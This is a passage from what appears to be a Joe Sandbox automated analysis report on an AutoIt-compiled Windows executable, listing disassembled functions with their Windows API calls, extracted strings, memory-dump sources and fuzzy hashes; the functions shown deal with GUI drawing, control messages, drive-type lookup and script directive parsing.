                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                                  • Opcode ID: 221b459676a4fa414dc653438c583d69b2d6aaaa73ef482f17b15444d9935ee3
                                                                                                                                                                  • Instruction ID: efa7ebfbf9ed169d61b59ad0497afd5ac76eac6677c30396873be2c8f98dd933
                                                                                                                                                                  • Opcode Fuzzy Hash: 221b459676a4fa414dc653438c583d69b2d6aaaa73ef482f17b15444d9935ee3
                                                                                                                                                                  • Instruction Fuzzy Hash: 6951FB30238711BB8F10DF94E85183DB794BB65704B92891AF41AA7191D7B0DE79EF42
                                                                                                                                                                  Function 001EC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                                                  • Opcode ID: b2998dfd5b073950d0fea43126ba1964557b8c1ba8a3fe7ca7a0947c33f057f7
                                                                                                                                                                  • Instruction ID: cd9cd43785a2b07b09146b189d343e8fa784e73332b8cb0cdb4a5e5ac1f2c360
                                                                                                                                                                  • Opcode Fuzzy Hash: b2998dfd5b073950d0fea43126ba1964557b8c1ba8a3fe7ca7a0947c33f057f7
                                                                                                                                                                  • Instruction Fuzzy Hash: AC616C31610746B7DB25EA259C83FBF33A8AF16344F044025FD45A60C3EB70DA66CAE1
                                                                                                                                                                  Function 001E48C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32 ref: 001E4956
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 001E4998
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 001E49A3
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 001E49AE
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 001E49B9
                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0025E179
                                                                                                                                                                  • 6F3A0200.COMCTL32(?,000000FF,?), ref: 0025E1B2
                                                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0025E5E0
                                                                                                                                                                    • Part of subcall function 001E49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001E4954,00000000), ref: 001E4A23
                                                                                                                                                                  • SendMessageW.USER32 ref: 0025E627
                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0025E63E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 377055139-4108050209
                                                                                                                                                                  • Opcode ID: 3afa94552dd44d6b301fb02d274731d00b2433e4a73c05cb55a6b4855597480b
                                                                                                                                                                  • Instruction ID: abeaeb7f6c736182348a3ec43627e663546d19a960017b2014cb8bd60196a930
                                                                                                                                                                  • Opcode Fuzzy Hash: 3afa94552dd44d6b301fb02d274731d00b2433e4a73c05cb55a6b4855597480b
                                                                                                                                                                  • Instruction Fuzzy Hash: 1612E230610642DFDF28CF15C888BAAB7E4BF08305F5544A9F999DB252C730ED59CB95
                                                                                                                                                                  Function 00246189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,0027DBF0), ref: 00246245
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                                                  • Opcode ID: 6a95c933e64666055c8c000e6b45c5ad1941a08b46956654d2bfcba49908ef50
                                                                                                                                                                  • Instruction ID: 6bccfdfbab44288d499d0f0af7df8b5a7ecc0f8fb5259b38c8bab7f1f93ffad8
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a95c933e64666055c8c000e6b45c5ad1941a08b46956654d2bfcba49908ef50
                                                                                                                                                                  • Instruction Fuzzy Hash: F8C1C5342242068BCB08EF14C455ABE77D6AFA5794F14486CF8865B396CB70DD6BCB83
                                                                                                                                                                  Function 0024D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0024D3BE
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0024D3C2
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0024D3D8
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0024D3E3
                                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 0024D3E8
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0024D400
                                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0024D40E
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0024D41F
                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0024D428
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0024D435
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0024D454
                                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0024D46B
                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0024D480
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0024D4A8
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0024D4CF
                                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0024D4ED
                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 0024D4F8
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0024D506
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0024D50E
                                                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0024D522
                                                                                                                                                                  • SelectObject.GDI32(?,0024D0B5), ref: 0024D539
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0024D544
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0024D54A
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0024D54F
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0024D555
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0024D55F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                                                  • Opcode ID: 5932b1bcccda92afe6bfc1f1c4dc0b8037e1f225f133d05859c3eec017d1090c
                                                                                                                                                                  • Instruction ID: cae30240b102790d0f869e61a82c18525146b4669fe2ea4d631eba632c3fc402
                                                                                                                                                                  • Opcode Fuzzy Hash: 5932b1bcccda92afe6bfc1f1c4dc0b8037e1f225f133d05859c3eec017d1090c
                                                                                                                                                                  • Instruction Fuzzy Hash: 30514C71E00208AFDF119FA4EC48EAEBBB9FF09320F218555F915AB2A1D7B19950CF50
                                                                                                                                                                  Function 0024B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0024B5C0
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0024B5D1
                                                                                                                                                                  • CharNextW.USER32(0000014E), ref: 0024B600
                                                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0024B641
                                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0024B657
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0024B668
                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0024B685
                                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0024B6D7
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0024B6ED
                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0024B71E
                                                                                                                                                                  • _memset.LIBCMT ref: 0024B743
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0024B78C
                                                                                                                                                                  • _memset.LIBCMT ref: 0024B7EB
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024B815
                                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0024B86D
                                                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 0024B91A
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0024B93C
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 0024B986
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0024B9B3
                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 0024B9C2
                                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0024B9EA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                                                  • Opcode ID: 8bfbae43446ec3f174dec057a74ba103e44c229c49ea2b7520c4c3258d23c765
                                                                                                                                                                  • Instruction ID: 990cee9fba1d8466f7db4110fe6e09f975103df20b5f73b235ff65ddb9e3b730
                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfbae43446ec3f174dec057a74ba103e44c229c49ea2b7520c4c3258d23c765
                                                                                                                                                                  • Instruction Fuzzy Hash: B4E18075910219ABDF169F54DC84EEEBBB8FF09710F108156F919AB191DB70CA60CF60
                                                                                                                                                                  Function 0024744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00247587
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0024759C
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 002475A3
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00247605
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00247631
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0024765A
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00247678
                                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0024769E
                                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 002476B3
                                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002476C6
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 002476E6
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00247701
                                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00247715
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024772D
                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00247753
                                                                                                                                                                  • GetMonitorInfoW.USER32 ref: 0024776D
                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00247784
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 002477EF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                                  • Opcode ID: ce88acdb0ffa677f0a6676b4402df22a297f869de33479463c62e59ce90249b7
                                                                                                                                                                  • Instruction ID: bca0b03eb826c93f1104209a7b123890291abc5ec5f787227400af4f8ba2d973
                                                                                                                                                                  • Opcode Fuzzy Hash: ce88acdb0ffa677f0a6676b4402df22a297f869de33479463c62e59ce90249b7
                                                                                                                                                                  • Instruction Fuzzy Hash: E7B1AE71618341AFDB08DF64D948B6EBBE9FF88310F00891DF5999B291DBB0E815CB91
                                                                                                                                                                  Function 001FA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001FA839
                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 001FA841
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001FA86C
                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 001FA874
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 001FA899
                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001FA8B6
                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 001FA8C6
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001FA8F9
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001FA90D
                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 001FA92B
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 001FA947
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001FA952
                                                                                                                                                                    • Part of subcall function 001FB736: GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                    • Part of subcall function 001FB736: ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,001FACEE), ref: 001FA979
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                  • Opcode ID: b6a24378b2cd1beb0334b5acf148f7d99ddf1f4984878bd4ca2237035cd09b09
                                                                                                                                                                  • Instruction ID: 54ba2432c1693be55ee314023eb75bc2b301453a49d573d25224919d1f0847d6
                                                                                                                                                                  • Opcode Fuzzy Hash: b6a24378b2cd1beb0334b5acf148f7d99ddf1f4984878bd4ca2237035cd09b09
                                                                                                                                                                  • Instruction Fuzzy Hash: BDB19171A1020AEFDB14DFA8DC49BAD7BB4FF08315F114229FA19A72A0DBB4D811CB51
                                                                                                                                                                  Function 002469C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00246A52
                                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00246B12
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                                                  • Opcode ID: eb71373dd8be1a637e0269475a53eb068312b8d2578166075c31a6c49f4fb72a
                                                                                                                                                                  • Instruction ID: c055114fc532ecba23d1f69f3fdbe7bfbefdf5a0b97fbeefa7c3d842b3c25e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: eb71373dd8be1a637e0269475a53eb068312b8d2578166075c31a6c49f4fb72a
                                                                                                                                                                  • Instruction Fuzzy Hash: D5A1B3302246059BCB08EF14C855A7AB3A5FF55354F14882DF8969B3D2DB70EC16CB82
                                                                                                                                                                  Function 0021DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021DD87
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0021DE28
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021DE3B
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0021DE90
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021DECC
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0021DF03
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021DF55
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021DF8B
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021DFA9
                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 0021DFB0
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021E02A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E03E
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0021E064
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E078
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
